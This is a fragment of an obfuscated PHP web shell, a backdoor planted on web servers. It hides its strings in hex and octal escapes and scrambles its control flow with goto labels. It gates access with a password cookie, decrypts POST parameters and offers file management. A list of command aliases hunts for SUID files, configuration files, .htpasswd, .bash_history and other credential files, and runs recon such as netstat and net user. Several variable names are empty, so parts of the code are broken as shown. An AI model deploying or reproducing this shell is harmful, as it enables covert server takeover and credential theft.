"\x27\76\12\11\11\x3c\x73\160\141\156\x3e\x55\x70\154\x6f\x61\x64\40\x66\x69\x6c\x65\72\74\57\x73\160\141\x6e\76{$is_writable}\74\x62\x72\76\x3c\151\156\160\x75\164\x20\x63\x6c\141\x73\x73\75\x27\x74\157\157\154\x73\x49\x6e\160\x27\40\x74\x79\x70\145\x3d\146\x69\x6c\145\40\156\141\x6d\145\x3d\146\133\135\40\40\155\165\154\x74\x69\x70\x6c\145\x3e\x3c\151\156\x70\165\x74\40\164\171\160\145\75\163\x75\x62\155\151\164\40\166\x61\154\x75\x65\x3d\x27\x73\x75\x62\155\x69\164\x27\x3e\x3c\x2f\146\x6f\x72\x6d\x3e\x3c\142\162\40\40\x3e\x3c\x2f\164\144\x3e\xa\11\74\x2f\x74\x72\76\74\x2f\164\x61\x62\x6c\145\x3e\x3c\57\144\151\166\x3e\12\x9\74\41\x2d\55\x20\160\x61\162\164\x69\143\154\x65\x73\40\x2d\x2d\76\40\x3c\144\x69\166\x20\x69\144\75\47\160\141\x72\x74\151\143\x6c\145\163\x2d\152\x73\47\x3e\74\x2f\x64\151\166\x3e\74\163\143\x72\151\160\164\x20\x73\x72\143\75\x27\150\x74\164\x70\163\72\x2f\x2f\x63\144\156\x2e\152\163\144\x65\154\151\166\162\56\x6e\145\164\x2f\x70\141\x72\164\151\x63\x6c\x65\163\56\x6a\x73\x2f\x32\56\60\56\60\57\160\x61\162\x74\x69\143\x6c\145\163\x2e\x6d\x69\x6e\x2e\x6a\x73\47\x3e\x3c\x2f\163\143\162\x69\x70\164\x3e\12\11\x3c\x73\143\x72\151\160\x74\76\x70\x61\x72\164\151\x63\x6c\x65\163\x4a\x53\50\47\x70\x61\x72\x74\x69\143\x6c\145\x73\x2d\152\x73\47\54\40\x7b\47\x70\x61\162\x74\151\x63\x6c\x65\163\x27\x3a\x7b\x27\x6e\165\x6d\142\x65\x72\x27\72\173\x27\166\x61\x6c\x75\x65\x27\72\70\60\x2c\x27\x64\x65\156\x73\x69\x74\171\x27\72\173\x27\x65\156\141\x62\x6c\145\x27\72\x74\162\165\145\54\x27\166\141\154\165\145\x5f\141\x72\x65\141\x27\x3a\x38\60\x30\x7d\x7d\x2c\x27\x63\x6f\154\x6f\x72\x27\x3a\x7b\47\166\141\x6c\x75\x65\47\72\47\x23\x66\x66\146\x66\146\x66\47\175\54\47\163\150\141\160\x65\x27\72\x7b\x27\x74\x79\160\145\x27\x3a\47\x74\162\x69\x61\x6e\147\154\x65\x27\x2c\47\163\x74\x72\x6f\x6b\145\47\72\173\x27\167\x69\144\164\x68\47\72\x30\54\x27\x63\157\154\x6f\x72\47\x3a\47\x23\x30\x30\x30\60\60\60\x27\x7d\x2c\x27\160\x6f\x6c\171\147\x6f\x6e\47\72\173\47\156\142\137\x73\151\144\145\x73\47\x3a\65\x7d\54\x27\x69\x6d\141\x67\145\x27\72\173\47\163\162\x63\x27\x3a\47\x69\155\x67\57\147\x69\164\x68\x75\x62\x2e\x73\166\147\47\54\x27\167\x69\x64\x74\150\47\72\61\60\60\54\x27\150\x65\x69\x67\150\x74\47\72\61\x30\x30\x7d\175\54\47\x6f\160\141\143\151\164\171\x27\x3a\x7b\47\x76\x61\154\x75\x65\47\72\x30\x2e\65\x2c\47\x72\x61\156\x64\x6f\155\x27\x3a\x74\x72\165\x65\54\x27\141\156\151\x6d\47\72\x7b\47\x65\x6e\141\142\154\x65\x27\72\x66\x61\x6c\163\x65\54\47\163\x70\x65\x65\x64\47\72\x31\x2c\x27\157\160\x61\x63\151\x74\x79\x5f\x6d\151\156\47\72\x30\x2e\61\54\x27\163\x79\156\x63\47\x3a\x66\x61\154\x73\x65\175\x7d\54\47\163\151\x7a\145\x27\72\x7b\x27\x76\x61\154\165\x65\47\72\63\x2c\47\x72\x61\156\144\157\155\47\x3a\164\162\x75\x65\54\x27\x61\156\x69\155\x27\x3a\x7b\47\x65\x6e\x61\142\154\x65\x27\x3a\146\141\x6c\163\x65\x2c\47\x73\x70\x65\145\x64\x27\72\64\x30\x2c\47\163\x69\x7a\145\x5f\155\x69\x6e\47\72\x30\56\x31\54\47\163\x79\x6e\x63\47\72\x66\x61\154\x73\x65\175\x7d\54\47\x6c\151\156\145\137\154\151\156\x6b\x65\x64\x27\x3a\173\47\x65\x6e\x61\142\x6c\x65\47\x3a\164\x72\165\145\54\47\x64\x69\x73\164\x61\156\x63\x65\47\72\62\60\60\54\47\x63\157\154\157\162\47\72\x27\x23\x66\146\x66\146\x66\x66\x27\54\x27\157\x70\x61\x63\151\164\x79\x27\x3a\60\56\x34\54\x27\x77\151\144\x74\x68\x27\x3a\x31\175\x2c\x27\155\157\166\145\x27\x3a\x7b\47\145\x6e\x61\x62\x6c\x65\x27\x3a\164\162\x75\145\54\x27\x73\x70\x65\x65\144\47\72\x31\x2c\x27\x64\x69\x72\x65\x63\164\x69\157\156\x27\72\47\156\157\x6e\145\x27\x2c\47\x72\x61\156\x64\157\155\47\72\x74\162\x75\x65\54\x27\x73\x74\162\x61\x69\x67\150\x74\47\x3a\146\141\154\x73\145\54\x27\157\x75\164\137\155\157\144\145\x27\72\x27\157\x75\164\47\54\47\142\x6f\x75\156\x63\145\47\x3a\146\141\x6c\x73\x65\54\47\x61\x74\x74\x72\141\143\x74\x27\72\x7b\47\x65\x6e\141\x62\154\145\x27\x3a\x66\141\154\163\x65\54\47\162\x6f\164\141\x74\x65\x58\47\72\x31\x30\x30\60\60\54\x27\x72\157\164\x61\164\145\131\x27\72\61\x30\x30\60\60\175\x7d\175\x2c\x27\151\x6e\164\x65\x72\141\143\164\x69\166\x69\x74\x79\x27\x3a\x7b\x27\144\145\164\x65\x63\164\x5f\x6f\156\47\72\47\x63\x61\x6e\x76\141\x73\x27\x2c\47\145\166\x65\156\x74\163\x27\72\x7b\x27\x6f\156\150\x6f\x76\x65\x72\47\72\173\47\x65\156\x61\x62\x6c\145\47\72\x74\162\165\145\x2c\47\155\x6f\144\x65\47\x3a\47\x67\162\141\142\x27\x7d\54\x27\157\x6e\x63\154\x69\x63\153\x27\x3a\173\x27\145\x6e\141\x62\x6c\x65\47\72\x74\162\165\x65\54\x27\155\x6f\144\145\47\x3a\47\162\145\x70\165\154\163\x65\47\x7d\54\47\162\x65\163\151\x7a\x65\x27\72\x74\162\x75\145\175\54\47\155\157\x64\x65\x73\x27\x3a\x7b\47\x67\x72\x61\x62\x27\72\x7b\x27\144\x69\163\x74\x61\156\x63\x65\x27\x3a\x32\x30\60\x2c\47\x6c\x69\x6e\145\137\x6c\151\156\x6b\145\x64\x27\72\173\47\x6f\160\x61\143\151\x74\x79\47\x3a\x30\56\65\175\x7d\54\x27\142\165\142\142\x6c\145\x27\72\173\47\160\x61\162\x74\151\143\x6c\x65\x73\137\156\x62\x27\x3a\x32\175\x7d\175\x2c\x27\162\145\x74\151\156\x61\x5f\144\145\164\145\x63\164\x27\72\164\162\165\145\x7d\51\x3b\x3c\x2f\x73\x63\x72\x69\x70\x74\76\xa\x9\x3c\x2f\142\x6f\144\171\x3e\74\57\150\164\155\154\x3e"; } goto gm5Ck; FVur6: if (!isset($_POST["\x6e\x65"])) { if (isset($_POST["\141"])) { $_POST["\x61"] = iconv("\165\164\x66\x2d\x38", $_POST["\x63\x68\x61\x72\x73\145\x74"], decrypt($_POST["\x61"], $_COOKIE[md5($_SERVER["\110\x54\124\120\137\110\x4f\123\x54"]) . "\x6b\145\171"])); } if (isset($_POST["\143"])) { $_POST["\143"] = iconv("\165\164\x66\x2d\x38", $_POST["\x63\x68\x61\x72\163\145\164"], decrypt($_POST["\143"], $_COOKIE[md5($_SERVER["\x48\x54\x54\120\137\x48\x4f\x53\x54"]) . "\x6b\x65\171"])); } if (isset($_POST["\160\61"])) { $_POST["\x70\61"] = iconv("\x75\164\x66\x2d\x38", $_POST["\143\150\x61\x72\x73\145\x74"], decrypt($_POST["\160\x31"], $_COOKIE[md5($_SERVER["\x48\x54\x54\120\137\110\117\123\x54"]) . "\153\145\x79"])); } if (isset($_POST["\x70\62"])) { $_POST["\160\x32"] = iconv("\x75\164\x66\x2d\x38", $_POST["\143\x68\141\162\x73\x65\x74"], decrypt($_POST["\160\62"], $_COOKIE[md5($_SERVER["\110\124\x54\120\137\110\117\x53\124"]) . "\x6b\145\171"])); } if (isset($_POST["\x70\x33"])) { $_POST["\x70\x33"] = iconv("\165\164\x66\x2d\x38", $_POST["\x63\150\141\x72\163\x65\x74"], decrypt($_POST["\160\x33"], $_COOKIE[md5($_SERVER["\110\x54\124\x50\x5f\110\117\x53\124"]) . "\153\145\171"])); } } goto R8xcz; oSUTr: $ = "\x55\124\106\x2d\70"; goto qDiW5; urnx6: function actionLogout() { setcookie(md5($_SERVER["\x48\x54\124\120\x5f\x48\117\x53\x54"]), '', time() - 3600); die("\74\144\151\166\x20\141\x6c\151\147\x6e\x3d\x27\x63\145\156\164\145\162\x27\x3e\74\x64\151\166\x20\143\x6c\141\x73\x73\75\x27\x63\157\156\x74\x61\151\156\x65\x72\47\76\74\144\151\166\40\x63\154\x61\163\x73\x3d\x27\163\x6b\x79\x27\76\74\x64\151\x76\x20\143\x6c\141\x73\x73\x3d\47\164\x65\170\164\x27\76\x54\x48\x41\116\x4b\40\x59\117\125\x20\x26\x20\102\131\x45\x3c\57\144\x69\x76\76\74\x64\151\x76\x20\x63\x6c\x61\163\163\75\x27\163\x74\141\x72\x73\47\76\74\x2f\x64\x69\166\76\x3c\144\151\x76\40\x63\x6c\141\163\163\75\x27\x73\x74\x61\162\163\61\x27\x3e\x3c\x2f\144\x69\166\x3e\x3c\x64\151\x76\40\x63\154\141\x73\x73\x3d\47\x73\164\x61\162\x73\x32\47\76\x3c\x2f\144\151\x76\76\x3c\144\x69\x76\x20\143\x6c\x61\163\163\x3d\x27\163\150\157\157\x74\151\156\147\55\163\164\141\x72\163\47\x3e\74\x2f\x64\151\166\x3e\74\57\x64\151\x76\x3e\74\x2f\x64\x69\166\76\74\57\144\x69\166\x3e\xa\x3c\x73\164\x79\154\145\76\x68\x74\155\x6c\x7b\150\145\151\147\150\164\72\61\60\x30\x25\175\150\164\155\154\40\142\157\144\x79\x7b\x77\151\144\164\150\x3a\61\60\x30\x25\73\x68\145\151\x67\x68\x74\x3a\x31\x30\60\45\73\155\141\162\x67\x69\x6e\x3a\x30\73\x66\157\x6e\x74\x2d\146\x61\155\151\154\171\x3a\116\x75\156\151\x74\157\x2c\x20\x73\141\156\163\55\x73\145\162\x69\146\73\x7d\x2e\x63\x6f\x6e\x74\141\x69\x6e\145\162\x7b\144\151\163\x70\x6c\x61\171\x3a\x62\154\x6f\x63\153\x3b\x70\x6f\163\151\164\x69\157\x6e\72\162\x65\154\x61\164\151\x76\x65\73\x77\151\x64\164\x68\72\61\60\x30\x25\x3b\150\145\151\147\x68\164\x3a\61\x30\x30\45\73\x62\141\x63\153\147\162\157\x75\x6e\x64\72\x6c\151\x6e\x65\141\x72\55\147\x72\x61\144\x69\145\156\164\x28\x74\x6f\40\x62\157\x74\x74\x6f\155\54\43\60\62\x30\x31\x30\x37\40\x30\54\x23\x32\x30\x31\x62\x34\x36\40\61\x30\x30\45\51\x7d\x2e\143\x6f\156\164\x61\x69\x6e\x65\x72\x20\56\164\x65\170\164\x7b\143\157\x6c\157\x72\x3a\43\146\146\x66\x3b\160\x6f\163\x69\164\x69\x6f\x6e\x3a\141\x62\x73\157\x6c\x75\x74\145\x3b\164\x6f\x70\72\x35\60\x25\73\x72\151\x67\150\x74\x3a\65\x30\x25\73\155\141\162\147\x69\156\x3a\55\x31\60\x70\170\40\x2d\x37\x35\x70\170\x20\x30\40\60\x3b\x66\157\x6e\164\55\x73\x69\172\x65\x3a\62\x30\x70\170\x3b\146\x6f\x6e\164\55\x66\x61\155\151\154\x79\72\116\165\156\x69\x74\157\54\x20\x73\141\x6e\x73\x2d\x73\x65\162\x69\146\73\x66\x6f\156\164\55\167\x65\x69\147\150\x74\72\67\60\x30\x7d\56\163\x68\157\x6f\164\151\156\x67\55\x73\x74\141\x72\x73\173\172\x2d\151\156\x64\145\x78\72\x31\60\73\167\x69\144\x74\x68\x3a\x35\x70\x78\73\x68\145\x69\147\x68\164\x3a\x38\x35\x70\x78\73\142\x6f\x72\x64\x65\x72\55\x74\157\160\55\x6c\145\x66\x74\x2d\162\x61\144\151\x75\x73\x3a\x35\x30\45\x3b\x62\157\162\x64\145\162\55\x74\157\x70\55\x72\x69\147\150\164\55\x72\x61\144\x69\165\x73\72\x35\x30\x25\73\160\x6f\x73\x69\x74\x69\x6f\156\72\141\142\x73\157\154\x75\164\145\73\x62\157\x74\164\157\x6d\72\60\x3b\162\x69\x67\x68\164\x3a\x30\73\x62\x61\143\x6b\147\x72\x6f\x75\156\144\x3a\x6c\x69\156\145\x61\162\x2d\147\x72\x61\144\151\x65\156\x74\50\x74\x6f\40\x74\x6f\x70\x2c\x72\147\x62\x61\50\62\x35\x35\54\x32\65\x35\x2c\62\65\65\x2c\60\51\x2c\43\x66\x66\146\51\x3b\x61\x6e\x69\155\x61\164\151\157\x6e\x3a\x61\x6e\x69\155\x53\x68\x6f\x6f\x74\151\156\147\123\x74\141\x72\x20\x31\x30\163\x20\x6c\151\156\145\x61\162\40\x69\x6e\146\151\x6e\151\x74\145\175\100\153\x65\171\x66\162\141\x6d\145\x73\x20\141\x6e\x69\x6d\123\164\x61\x72\173\x66\162\157\x6d\173\164\162\141\156\163\x66\157\162\x6d\x3a\x74\162\x61\156\163\154\141\164\x65\x59\50\x30\x29\x7d\164\x6f\x7b\164\162\x61\x6e\163\146\157\162\x6d\72\164\x72\x61\x6e\163\154\x61\x74\145\131\50\x2d\x32\65\66\60\x70\x78\x29\40\164\162\141\x6e\x73\154\141\164\x65\x58\50\55\x32\65\66\60\160\170\x29\x7d\175\x40\153\x65\171\146\x72\x61\x6d\145\x73\40\x61\x6e\x69\x6d\123\x68\157\x6f\x74\151\156\147\123\164\141\x72\173\x66\x72\157\155\173\x74\162\141\156\x73\146\157\x72\x6d\72\164\x72\141\x6e\x73\154\141\x74\x65\x59\50\x30\51\x20\x74\x72\141\156\163\x6c\141\x74\145\x58\50\x30\51\x20\x72\157\x74\x61\164\145\x28\x2d\64\65\x64\x65\147\51\x3b\157\160\141\143\151\164\171\x3a\61\73\x68\145\151\x67\150\x74\x3a\x35\x70\x78\175\x74\x6f\x7b\164\x72\x61\156\163\x66\x6f\x72\x6d\72\x74\162\141\x6e\163\x6c\x61\164\145\131\x28\55\62\65\66\x30\160\170\51\x20\164\x72\x61\x6e\163\154\141\x74\145\130\50\x2d\62\x35\66\x30\160\170\51\40\x72\x6f\164\141\164\x65\x28\55\x34\65\144\x65\147\51\73\157\x70\141\x63\x69\164\171\x3a\x31\73\x68\x65\x69\147\x68\x74\x3a\x38\60\60\x70\x78\x7d\175\x3c\x2f\163\x74\x79\x6c\x65\76\xa\x3c\x66\x6f\157\164\x65\162\40\x69\x64\75\x27\144\x65\164\x27\x20\x73\x74\x79\x6c\145\x3d\x27\160\157\163\151\x74\151\157\156\72\x66\x69\170\145\144\73\40\x6c\x65\x66\x74\72\60\160\x78\73\40\x72\151\147\150\x74\72\x30\x70\x78\73\40\142\157\164\x74\x6f\155\72\x30\x70\170\x3b\x20\x62\141\x63\x6b\x67\162\157\x75\x6e\144\72\162\x67\x62\x28\60\54\60\54\x30\51\73\x20\164\145\x78\164\55\x61\x6c\151\147\x6e\72\x63\145\x6e\164\145\162\x3b\x20\142\x6f\x72\144\x65\162\55\x74\157\160\x3a\40\61\160\x78\40\163\x6f\x6c\x69\x64\40\x23\x66\146\x30\x30\67\145\x3b\40\x62\x6f\x72\144\x65\x72\55\142\157\x74\164\x6f\x6d\x3a\40\61\x70\170\40\x73\x6f\154\x69\144\40\x23\x66\x66\60\x30\67\145\47\x3e\x3c\x66\157\x6e\x74\x20\146\141\143\x65\75\x27\103\145\x6e\x74\x75\162\171\x20\107\x6f\x74\x68\151\x63\47\40\143\157\x6c\x6f\162\x3d\x27\43\x66\x66\x30\x30\64\x38\x27\40\x73\x69\x7a\145\x3d\x27\65\47\x3e\x3c\146\157\156\x74\x20\x73\x74\171\x6c\145\75\x27\x66\157\x6e\x74\x2d\x73\x69\172\x65\72\40\61\60\160\x74\x27\40\146\x61\x63\x65\75\47\x43\x65\x6e\164\165\x72\171\x20\x47\157\164\150\x69\143\x27\x3e\74\146\157\x6e\164\40\x66\141\143\x65\75\47\124\x61\150\157\155\x61\x27\x20\x63\x6f\x6c\x6f\x72\75\47\43\60\60\x35\141\x66\x66\x27\x20\163\x69\172\x65\x3d\47\62\x2e\x35\x27\76\74\146\x6f\x6e\x74\x20\143\x6f\x6c\157\x72\x3d\x27\43\x66\x66\x30\x30\x37\x65\47\x3e\74\x62\76\x20\xc2\251\157\160\171\302\256\x69\147\x68\164\40\72\x20\x3c\57\142\x3e\x3c\x2f\146\x6f\x6e\164\x3e\xa\x3c\x6d\x61\162\161\165\145\145\x20\163\143\x72\x6f\x6c\154\141\155\x6f\165\x6e\x74\75\x27\x33\47\40\x73\x63\x72\157\x6c\x6c\x64\x65\x6c\141\x79\75\47\x36\60\47\x20\x77\x69\144\164\150\75\x27\x38\x30\45\x27\76\74\x62\x3e\124\167\x65\x70\154\x20\x26\x20\x3c\x61\x20\150\162\145\x66\x3d\47\x68\164\164\160\163\x3a\57\x2f\147\151\164\x68\x75\142\x2e\x63\157\155\x2f\x6d\x49\x63\110\x79\101\155\122\x61\x4e\x65\x27\x3e\x6d\111\x63\x48\171\74\57\x61\76\40\74\x2f\x62\76\x3c\57\155\141\162\x71\x75\x65\x65\x3e\x20\x20\x3c\57\x66\x6f\156\x74\x3e\74\x2f\x66\157\156\164\76\x3c\x2f\x66\x6f\x6e\x74\x3e\x3c\x2f\146\157\157\x74\145\x72\x3e"); } goto asFIH; YIyjV: if (isset($_POST["\143"])) { @chdir($_POST["\x63"]); } goto wlqmv; p17RR: if (!empty($)) { if (isset($_POST["\160\141\163\163"]) && md5($_POST["\x70\141\x73\163"]) == $) { prototype(md5($_SERVER["\110\x54\x54\x50\x5f\x48\x4f\123\124"]), $); } if (!isset($_COOKIE[md5($_SERVER["\x48\124\124\120\x5f\x48\117\123\124"])]) || $_COOKIE[md5($_SERVER["\x48\x54\124\120\137\110\x4f\x53\124"])] != $) { hardLogin(); } } goto B0PbS; f_hzt: if ($cwd[strlen($cwd) - 1] != "\x2f") { $cwd .= "\57"; } goto oh1bD; poC4M: @set_time_limit(0); goto BKw4L; M5O7z: if (empty($_POST["\141"])) { if (isset($) && function_exists("\x61\143\164\151\x6f\156" . $)) { $_POST["\x61"] = $; } else { $_POST["\x61"] = "\106\151\x6c\x65\163\115\141\x6e"; } } goto ZjyZB; y4kgJ: function viewPermsColor($f) { if (!@is_readable($f)) { return "\x3c\x66\x6f\x6e\164\40\143\157\154\157\x72\x3d\x23\106\106\x30\x30\60\x30\76\74\x62\x3e" . perms(@fileperms($f)) . "\x3c\57\142\x3e\74\x2f\146\157\x6e\x74\76"; } elseif (!@is_writable($f)) { return "\74\146\x6f\156\x74\x20\143\x6f\x6c\x6f\x72\75\x77\x68\151\164\x65\76\x3c\142\x3e" . perms(@fileperms($f)) . "\74\57\x62\76\74\x2f\146\157\156\164\x3e"; } else { return "\74\146\157\x6e\x74\40\x63\x6f\x6c\x6f\x72\x3d\43\x66\71\143\x34\64\x30\x3e\74\x62\76" . perms(@fileperms($f)) . "\74\x2f\x62\76\74\x2f\x66\x6f\156\x74\x3e"; } } goto YnRbs; IVjDo: if ($os == "\x77\x69\x6e") { $aliases = array("\114\151\x73\x74\40\104\151\x72\x65\143\x74\x6f\x72\171" => "\144\x69\x72", "\x46\x69\x6e\144\x20\x69\156\144\x65\x78\x2e\160\150\x70\x20\x69\x6e\40\143\x75\x72\162\145\x6e\x74\x20\x64\151\x72" => "\144\151\162\x20\57\163\40\57\167\x20\57\x62\x20\151\x6e\144\x65\170\x2e\x70\150\160", "\x46\x69\x6e\144\40\x2a\x63\157\156\x66\x69\x67\52\x2e\160\x68\160\x20\x69\x6e\40\143\x75\162\x72\x65\x6e\164\x20\144\151\x72" => "\144\x69\x72\40\x2f\163\x20\x2f\167\40\57\142\40\52\x63\x6f\x6e\146\x69\147\x2a\x2e\x70\x68\x70", "\x53\150\157\167\x20\x61\x63\x74\x69\166\x65\40\x63\157\x6e\x6e\145\143\164\151\157\156\163" => "\x6e\145\164\163\164\141\164\40\x2d\x61\156", "\123\150\x6f\167\40\x72\x75\x6e\156\151\x6e\147\40\x73\145\x72\x76\x69\143\x65\x73" => "\156\x65\x74\x20\163\x74\x61\x72\164", "\125\163\x65\x72\40\x61\143\143\x6f\165\x6e\x74\163" => "\156\x65\x74\40\165\163\145\162", "\123\x68\x6f\x77\x20\x63\157\x6d\x70\x75\164\x65\162\163" => "\156\145\x74\40\x76\x69\x65\x77", "\101\122\120\x20\x54\x61\x62\154\x65" => "\x61\x72\160\40\55\x61", "\x49\120\x20\103\157\x6e\x66\151\147\x75\x72\x61\164\151\157\156" => "\151\x70\143\x6f\156\x66\151\x67\40\57\141\154\154"); } else { $aliases = array("\114\151\163\x74\40\x64\x69\x72" => "\x6c\x73\x20\x2d\x6c\150\x61", "\x6c\151\163\164\x20\x66\x69\154\x65\x20\141\164\164\x72\x69\x62\165\164\x65\x73\x20\x6f\x6e\40\x61\40\114\151\x6e\165\x78\40\x73\x65\143\x6f\156\144\40\x65\x78\164\145\156\144\x65\144\x20\x66\151\154\145\40\163\171\163\x74\x65\x6d" => "\x6c\163\141\x74\164\x72\x20\x2d\166\141", "\x73\150\x6f\x77\40\x6f\160\145\156\145\x64\x20\x70\157\x72\164\x73" => "\x6e\145\164\x73\164\141\x74\x20\55\141\x6e\x20\x7c\x20\x67\162\145\160\40\x2d\x69\x20\154\x69\163\x74\145\x6e", "\160\x72\157\143\x65\163\163\40\x73\164\x61\x74\x75\x73" => "\160\163\40\x61\x75\x78", "\x46\x69\156\x64" => '', "\146\x69\156\x64\40\x61\154\154\x20\x73\165\x69\144\40\x66\x69\154\x65\x73" => "\x66\x69\156\144\x20\57\40\x2d\164\171\x70\x65\40\x66\40\x2d\160\x65\x72\x6d\x20\x2d\60\64\x30\x30\x30\x20\55\x6c\163", "\x66\151\156\x64\x20\163\x75\151\144\x20\x66\151\154\x65\163\x20\151\156\x20\x63\x75\162\x72\x65\156\x74\x20\x64\151\162" => "\x66\151\x6e\x64\40\56\40\55\x74\x79\x70\x65\x20\146\x20\55\x70\145\x72\x6d\x20\55\x30\64\60\60\x30\40\x2d\x6c\163", "\x66\x69\x6e\144\40\141\x6c\154\40\x73\x67\151\x64\x20\x66\151\154\x65\163" => "\x66\x69\x6e\x64\40\57\x20\55\x74\x79\x70\x65\40\146\x20\55\x70\x65\x72\155\x20\55\x30\x32\x30\x30\x30\40\55\x6c\x73", "\x66\x69\x6e\144\40\x73\147\x69\144\40\146\x69\154\145\163\x20\x69\x6e\40\x63\x75\x72\162\x65\156\164\x20\x64\x69\x72" => "\x66\151\156\144\40\x2e\x20\55\164\171\160\145\40\x66\x20\55\x70\145\162\x6d\x20\x2d\x30\62\60\60\x30\40\55\154\163", "\146\151\x6e\144\40\x63\x6f\x6e\x66\151\147\x2e\151\156\143\56\x70\150\x70\x20\x66\151\x6c\x65\163" => "\x66\151\156\144\x20\57\40\x2d\164\x79\x70\145\x20\x66\40\x2d\x6e\x61\x6d\x65\x20\x63\157\x6e\146\151\147\x2e\x69\156\143\56\160\150\160", "\x66\x69\x6e\144\x20\143\x6f\156\146\151\x67\x2a\40\146\151\154\x65\163" => "\x66\x69\x6e\144\x20\x2f\40\55\164\171\160\145\x20\146\x20\55\156\x61\x6d\x65\40\x22\143\157\156\146\x69\147\52\42", "\146\x69\156\144\40\143\157\156\146\x69\x67\52\40\146\151\x6c\x65\163\40\x69\156\x20\x63\x75\162\x72\x65\156\x74\40\x64\x69\162" => "\146\x69\156\144\x20\x2e\40\x2d\x74\171\160\x65\x20\x66\x20\x2d\156\141\155\145\x20\42\143\157\156\146\151\x67\52\42", "\146\151\x6e\144\x20\x61\x6c\154\x20\x77\x72\x69\164\141\x62\x6c\x65\40\x66\x6f\x6c\144\x65\x72\163\x20\141\x6e\144\x20\x66\151\x6c\145\x73" => "\x66\151\156\x64\x20\x2f\x20\55\160\145\x72\155\40\55\x32\x20\x2d\154\163", "\146\x69\156\x64\40\x61\154\x6c\x20\167\162\151\164\x61\x62\154\x65\40\x66\157\154\x64\145\x72\163\x20\141\x6e\144\40\x66\x69\154\x65\163\40\151\156\40\x63\x75\x72\162\145\156\x74\40\144\151\x72" => "\x66\x69\156\144\40\x2e\x20\55\x70\x65\x72\155\x20\55\62\x20\55\x6c\163", "\x66\x69\x6e\144\x20\141\154\154\40\163\x65\162\166\151\x63\x65\x2e\x70\167\x64\40\146\151\154\x65\x73" => "\x66\151\156\144\x20\x2f\x20\55\164\171\160\x65\40\146\x20\55\156\141\155\x65\x20\163\x65\x72\x76\151\x63\145\56\x70\167\x64", "\x66\151\156\144\x20\x73\x65\x72\x76\151\143\x65\56\160\x77\144\x20\146\151\x6c\x65\x73\40\x69\156\40\143\x75\162\x72\x65\156\x74\x20\x64\151\x72" => "\x66\x69\x6e\144\40\x2e\x20\x2d\164\x79\x70\x65\40\146\40\x2d\156\x61\x6d\x65\40\163\x65\162\x76\151\x63\x65\x2e\x70\167\144", "\146\x69\x6e\144\40\x61\154\154\40\x2e\x68\x74\x70\141\163\163\167\144\40\x66\x69\x6c\x65\163" => "\x66\x69\x6e\x64\40\57\x20\55\164\171\x70\145\x20\x66\x20\55\156\141\155\145\40\x2e\150\x74\x70\141\163\x73\167\144", "\146\x69\156\x64\x20\x2e\x68\x74\x70\141\x73\x73\167\x64\40\146\151\x6c\145\163\x20\151\156\x20\143\x75\162\x72\x65\x6e\x74\40\144\151\162" => "\x66\151\x6e\144\x20\56\x20\55\x74\x79\160\145\x20\x66\x20\55\156\x61\x6d\145\40\x2e\x68\164\160\141\163\x73\x77\144", "\146\x69\156\x64\x20\x61\x6c\154\x20\x2e\x62\141\163\x68\137\x68\151\x73\164\157\162\171\40\146\x69\x6c\145\163" => "\x66\151\x6e\x64\40\57\x20\x2d\164\x79\160\145\40\x66\x20\55\156\x61\x6d\145\40\56\x62\x61\163\x68\137\x68\151\163\164\157\162\x79", "\x66\151\x6e\144\40\56\142\x61\x73\150\137\150\x69\163\164\157\162\171\x20\146\151\154\x65\x73\40\151\x6e\x20\x63\x75\162\162\x65\x6e\164\x20\144\151\162" => "\x66\x69\x6e\x64\x20\56\x20\55\x74\x79\x70\x65\x20\146\40\x2d\x6e\x61\x6d\145\x20\56\x62\141\x73\150\x5f\x68\151\x73\x74\157\x72\x79", "\x66\x69\x6e\144\x20\x61\x6c\154\40\56\x66\145\164\143\x68\x6d\x61\x69\154\162\143\x20\x66\151\x6c\145\163" => "\146\x69\x6e\144\x20\57\40\x2d\164\x79\x70\145\x20\x66\40\55\x6e\141\155\x65\x20\x2e\146\145\164\143\150\x6d\141\x69\x6c\162\143", "\x66\151\156\x64\40\56\x66\x65\x74\143\x68\155\141\151\154\162\143\x20\146\151\154\145\x73\40\151\x6e\40\143\165\162\162\x65\156\x74\x20\144\151\162" => "\x66\x69\x6e\x64\x20\56\x20\x2d\164\171\160\145\x20\x66\40\x2d\156\141\155\x65\40\56\x66\145\164\x63\x68\x6d\141\151\x6c\x72\x63", "\114\x6f\x63\x61\164\x65" => '', "\154\157\x63\141\164\145\40\150\164\x74\x70\144\56\143\157\x6e\146\40\146\x69\x6c\145\163" => "\154\x6f\143\141\x74\145\40\x68\x74\164\160\144\56\143\x6f\156\146", "\x6c\x6f\143\x61\164\x65\x20\x76\150\x6f\163\x74\x73\56\x63\157\156\x66\x20\x66\151\154\145\x73" => "\x6c\157\143\x61\164\145\40\166\x68\157\x73\164\x73\x2e\x63\157\156\x66", "\154\157\143\x61\164\x65\40\160\162\x6f\x66\x74\x70\144\x2e\143\x6f\156\x66\40\146\x69\x6c\145\x73" => "\x6c\x6f\143\x61\x74\x65\40\x70\162\x6f\x66\164\160\x64\x2e\143\x6f\x6e\x66", "\x6c\x6f\x63\141\164\145\x20\160\163\x79\142\156\x63\56\143\157\x6e\x66\40\x66\151\154\145\163" => "\x6c\157\x63\141\164\x65\40\x70\x73\171\142\156\x63\x2e\x63\157\x6e\146", "\x6c\x6f\x63\141\164\x65\40\x6d\171\x2e\143\157\x6e\x66\x20\x66\x69\x6c\x65\x73" => "\154\157\x63\141\164\x65\40\x6d\171\56\x63\157\156\146", "\154\x6f\143\x61\164\x65\x20\141\144\155\x69\x6e\x2e\x70\x68\160\x20\146\x69\x6c\145\163" => "\x6c\x6f\143\x61\x74\145\x20\141\144\155\151\x6e\56\160\x68\x70", "\154\x6f\x63\141\164\145\x20\x63\x66\x67\x2e\160\x68\x70\x20\146\151\154\x65\x73" => "\x6c\x6f\143\x61\x74\145\x20\x63\146\147\56\160\x68\x70", "\x6c\157\143\141\164\x65\40\x63\157\x6e\146\56\160\150\x70\x20\146\x69\154\x65\x73" => "\x6c\x6f\143\141\164\145\x20\x63\157\156\x66\x2e\160\150\x70", "\x6c\x6f\x63\141\164\x65\40\143\157\156\x66\151\147\56\x64\x61\164\40\146\151\x6c\145\x73" => "\x6c\x6f\143\141\x74\x65\x20\143\157\156\x66\x69\147\x2e\x64\141\x74", "\154\x6f\x63\x61\164\145\40\143\x6f\156\x66\x69\147\56\x70\x68\160\x20\146\x69\x6c\x65\163" => "\154\157\143\x61\164\145\40\143\x6f\x6e\146\151\x67\x2e\160\150\160", "\x6c\x6f\x63\141\164\x65\x20\143\157\x6e\146\151\x67\56\151\156\x63\40\146\151\154\145\163" => 